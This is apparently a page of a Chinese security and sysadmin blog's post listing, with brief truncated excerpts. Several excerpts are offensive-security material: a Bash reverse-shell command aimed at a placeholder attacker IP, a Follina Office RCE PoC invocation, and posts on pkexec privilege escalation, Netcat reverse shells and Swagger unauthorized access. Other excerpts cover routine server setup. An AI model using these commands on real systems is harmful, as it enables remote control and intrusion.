最新发布第5页
排序
Xray扫描器
Xray 是一款功能强大的安全评估工具,主要特性有:检测速度快。发包速度快; 漏洞检测算法高效。支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。代码质量高。编...
Centos bond端口聚合
0x01 简介当linux系统上有多个单独网卡,又想充分利用这些网卡,同时对外提供一个统一的网络地址,以使得增大网络的吞吐量,同时也提高网络的可用性,这时就需要bond来帮助我们解决这个问题。Li...
Bash反弹shell
一、Bash介绍 Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下:bash -i >&/dev/tcp/攻击机_IP/攻击机端...
安装 Prometheus监控主机服务
一、安装 Prometheus下载 Prometheus 首先,访问 Prometheus 官网 获取最新版本的下载链接,然后使用 wget 下载:wget https://github.com/prometheus/prometheus/releases/download/v3.2.1/pro...
Swagger未授权访问
0x01 Swagger未授权访问Swagger是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。相关的方法,参...
开源IT资产管理软件GLPI
b开源IT资产管理软件GLPI介绍GLPI是法语Gestionnaire libre de parc informatique的缩写,是一款历史悠久的IT资产管理软件GLPI提供功能全面的IT资源管理接口,可以用来建立数据库全面管理...
Netcat反弹Shell
netcat 介绍Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。常用参数如下:参数描述-c指定连接后要执行的shel...
Microsoft Office (RCE) 命令执行 POC
漏洞复现本地测试环境:Windows 10Microsoft Office 2019项目地址:https://github.com/chvancooten/follina.py运行验证脚本:运行POC同时启动 Web 服务器:python3 follina.py -m binary -b \w...
Linux Polkit Pkexec本地权限提升漏洞(CVE-2021-4034)
前言polkit (原名PolicyKit)的 pkexec 中存在本地特权提升漏洞,该SUID-root程序默认安装在每个主要的Linux发行版上。该漏洞允许任何非特权用户通过在Linux默认配置中利用此漏洞来获得易受攻...
CentOS7.9下搭建身份验证服务器RADIUS(安装LAMP环境,部署FreeRadius+Daloradius web)
1.FreeRadius软件简介FreeRADIUS 是世界上使用最广泛的 RADIUS 服务器。它为全球大多数主要的互联网服务提供商和电信公司提供支持,并且是国际 Wi-Fi 教育漫游服务 eduroam 的关键技术之一。所...